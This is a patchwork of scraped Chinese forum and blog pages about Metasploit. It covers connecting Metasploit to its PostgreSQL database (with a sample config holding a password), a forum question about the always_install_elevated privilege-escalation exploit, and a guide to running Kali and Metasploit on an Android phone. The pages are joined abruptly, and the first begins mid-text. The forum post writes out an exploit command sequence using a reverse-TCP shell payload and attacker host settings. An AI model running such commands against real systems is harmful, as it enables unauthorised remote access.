Metasploit数据库问题汇总
然后会看见msf的一些输出，这些是初始数据，第一次关联数据库会有，第二次就没了。
等待输出完成之后，我们再输入命令db_status测试下是否链接好了
如果看到以下的回显，证明数据库已经成功和MSF相关联：
postgresql conneted to nmap
问题二：postgres数据库的开启与查看端口
首先查看数据库服务是否开启，在shell输入以下命令：
netstat -tnpl | grep postgres
如果开启，记下端口
如果没有，我们进入/etc/init.d/目录，shell命令：ls | grep postgres，找到metasploit-postgres，shell命令：./metasploit-postgres& start，即可开启postgres服务，如果要关闭用stop即可。开启后，记下端口。
问题三：查看postgres数据库的默认密码并连接数据库
用户名和密码放在/opt/metasploit/config/database.yml这个配置文件中，vim打开查看即可。文件的格式如下文所示：
development:
adapter: &postgresql&
database: &msf3dev&
username: &msf3&
password: &4bfedfc2&
port: 7337
host: &localhost&
timeout: 5
&&&[2]&&&&
【声明】:黑吧安全网()登载此文出于传递更多信息之目的，并不代表本站赞同其观点和对其真实性负责，仅适于网络安全技术爱好者学习研究使用，学习中请遵循国家相关法律法规。如有问题请联系我们，联系邮箱，我们会在最短的时间内进行处理。
上一篇：【】【】metasploit的exploit使用问题_metasploit学习吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0可签7级以上的吧50个
本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：3贴子：
metasploit的exploit使用问题
工作需要用metasploit去进行各种测试，刚开始学，有很多不懂之处，望大家指教！以前都是用metasploit中自带的各种exploit去做攻击测试，比较常见的就是利用各种软件的漏洞进行溢出攻击，实现执行任意代码，或者得到shell一般过程就是： use exploit/windows/xxx/xxxxxx然后设置一些参数最后执行 exploit 命令就行了如：use exploit/windows/browser/crystal_reports_printcontrolset PAYLOAD（我常用的是windows/shell/reverse_tcp）set LHOST 192.168.0.100set SRVHOST 192.168.0.100set URIPATH aaa exploit（目标机器有对应漏洞的话，执行这个就可以了）但是这次我要测试的exploit，和以前用的那些类型不一样，我不知道怎么用，希望大家指导一下！exploit详情：exploits\windows\local\always_install_elevated截图如下：上图是这个 exploit 的 info 内容，请大家帮忙看看我有如下疑问：1、参数里只有一个SESSION，这是什么意思啊？以前都是攻击成功后得到session啊，这里怎么一上来就要设置session啊？我好困惑啊，都还没攻击呢，哪里有session啊。。。2、这个需要用PAYLOAD么？3、描述里写的一大堆看不太懂，请问成功攻击前提是什么？需要什么软件漏洞么？4、如果哪位成功了（只要攻击包能发出去就行），请告诉我具体方案另：我的 metasploit 版本是4.5该 exploit 是我最近下载更新的，metasploit v4.5版本的自带中应该没有该 exploit 的源代码，如果哪位需要的话，请去官网自行下载或者请联系我如果有人成功发出攻击包了，请尽量再帮忙抓下攻击数据包（我用的抓包工具是wireshark，数据包保存格式请选择为 .pcap，一定不要是 .pcapng）如下图：有人成功了或者抓到包了，或者有任何问题，请发邮件给我：谢谢！
文档翻译,年终钜惠！注册就送268元体验金！
贴吧热议榜
使用签名档&&
保存至快速回贴Android下跑kali疑难问题解决方案 -
| 关注黑客与极客
Android下跑kali疑难问题解决方案
共689673人围观
，发现 63 个不明物体
说实话现在的智能移动设备是越来越牛逼了。那天你在路上看见一个人猥猥琐琐的的站在路边手指在不断的触控手机并时不时抬头四处张望……八成这人是在等人，剩下两成这人可能正在用手机折腾各大肯德基、星巴克的wifi。
本着人人有责我也要参一脚的想法，在网上看到安卓能跑kali了！这里参考FreeBuf P0tty大大的文章做为基础：
也就手残的开始折腾了，无奈折腾来折腾去总是出现这样那样的问题，去网上找相关的解决方法结果看到许多这样的东西
1、我一次就成功了啊。完全没问题
2、我用metasploit很正常啊（后面一堆问如何解决。然后就没然后了）
3、为什么我运行metasploit的时候报错呢？（没人回复了啊！）
于是乎，在经历各种麻烦的东西后，终于成功了。在此真真切切给各位分享下。
注：收集的问题可能不会全面，解释的也可能不太清楚，不过我想对于广大处于手残脸黑没人品状态的同学们还是有些帮助的吧~
首先，我用的设备是
魅族&MX3&32G&TD移动版
Flyme&OS&3.7.3A系统
首先根据大大的文章，我们准备好该准备的东西
当头问题就是“手机能不能装的下这玩意”
手机基本都有外置的SD卡，所以容量是足够的，可是一般的SD卡都是fat格式，创建文件都是无法大于4G的。这个问题就不用担心，因为linux deploy创建镜像文件是类似在电脑上弄虚拟机的动态分配一样的东西，慢慢一点点的弄。所以不用担心。
当然你要是还是担心，格式化你的SD卡成ext4格式吧。
（另外一些像是魅族这样的内置储存的，一般都支持大于4G的文件考入。）
接下来是linux deploy的配置问题，我们按照大大来设置不过当中一些需要更改，首先是这两个
第一个箭头：原来的源地址实在是太坑了，安装5次起码丢包4次，一丢包就得重新安装（许多人死在这里，没看见丢包就点了start，结果不是ssh没启动就是vnc没启动），所以我们还是用中国源~
& 中科大镜像（稳定，快速，酸爽）
第二个箭头：这个是创建镜像的地方，按照你自己内存卡的位置设定。
第一个选择默认是最好的了
第二个是选择组件的，最好是全选了。当然空间不够的也可以不用动。
之后开始，有的同学又遇到问题了
&&&&begin:&install
checking&mount&points&…done
checking&installation&path&…done
making&new&disk&image(0mb)&…fail
&&&end&:install
这个问题就是你之前创建了一个镜像了，结果丢包后重新来了一次，就出现了这样的东东。
解决它就是去删了这个镜像，然后重启你的手机，如果还有问题，在根目录建个文件夹，把镜像地址选在里面，也就解决了。
千辛万苦终于给装完了。按照大大的说法，是时候安装metasploit来装B了！
不过这里就有些不同了。想当初我也是卡这半天，装metasploit后，启动硬是不断的报错！啥
set&a&breakpoint&in&malloc_error_break&to&debug
dyld:&lazy&symbol&binding&failed:&Symbol&not&found:&__OSSwapInt32
Referenced&from:&/usr/lib/ruby/1.9.1/arm-darwin9/socket.bundle
Expected&in:&flat&namespace
dyld:&Symbol&not&found:&__OSSwapInt32
Referenced&from:&/usr/lib/ruby/1.9.1/arm-darwin9/socket.bundle
Expected&in:&flat&namespace
Trace/BPT&trap:&5
[FAIL]&Postgresql&must&be&started&before&Metasploit&…&failed!
invoke-rc.d:&initscript&metasploit,&action&&start&&failed.
dpkg:&error&processing&metasploit&(–configure):
subprocess&installed&post-installation&script&returned&error&exit&status&5
Errors&were&encountered&while&processing:
metasploit
cannot&copy&extracted&data&for&‘./opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/nokogiri-1.6.0/ext/nokogiri/Makefile’&to&‘/opt/metasploit/apps/pro/ui/vendor/bundle/ruby/1.9.1/gems/nokogiri-1.6.0/ext/nokogiri/Makefile.dpkg-new’:&failed&to&write&(No&space&left&on&device)
等等一系列的问题啊！于是许多人放弃了，可是，有人说过“死猪不怕开水烫”通过长期不断的实践（假的），我找到了问题的关键
1、你没有登录root账户运行！
2、安装过程出现了问题你却认为没问题！
3、安装的版本不对啊！
4、你没空间了！
所以按照我的步骤来做做看（前面设置也要按照我弄哦，尤其是源！）
①登录ssh，sudo&su来登录root
②apt-get&update更新源
③apt-get&metasploit安装神器
轻松三步，让你拥有可爱的metasploit
之后我们在ssh上用root账户运行msfconsole
你会发现问题解决了有木有~
当然第一次运行时候数据库没有创建cache，于是搜索东西很慢
运行这个命令
msf&db_build_cache
等待很久后就可以快速的搜索了（之后每次更新metasploit后都要这样。。）
第二次开启kali后
首先要运行postgresql
root@localhost:home/android#&service&postgresql&start
之后再运行metasploit
最后贴个图，证明metasploit还是跑的了的啊！
[本文由喵呜君原创并投稿，转载请注明来自]
Updating configuration file … done[18:56:53] &&& begin: install[18:56:53] Checking mount points … fail 总提示这个……。楼主怎么解决，重新安装过多次
本人精通各种软件工具的安装与卸载………哎哎哎，工头我错了，我去搬砖还不行嘛…哎哎，别打了…
我能说出我心中的疑问么，请别打我。你们真的会特地拿手机去玩那些wifi或者拿来做渗透么。。。 如果会的话 为什么不用电脑呢。。
买个nexus5直接刷kali的官方系统
手机是intel芯片咋办呢？
必须您当前尚未登录。
必须（保密）
NekoNekoni~~~
分享每日精选文章关于metasploit渗透测试魔鬼训练营中的一些问题_metasploit吧_百度贴吧
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&签到排名：今日本吧第个签到，本吧因你更精彩，明天继续来努力！
本吧签到人数：0成为超级会员，使用一键签到本月漏签0次！成为超级会员，赠送8张补签卡连续签到：天&&累计签到：天超级会员单次开通12个月以上，赠送连续签到卡3张
关注：1,463贴子：
关于metasploit渗透测试魔鬼训练营中的一些问题收藏
搭建环境那部分中的winxp metasploit配置
怎么对c:\windows\system32\hosts进行修改
文档翻译,年终钜惠！注册就送268元体验金！
顶顶顶顶顶
登录百度帐号推荐应用
为兴趣而生，贴吧更懂你。或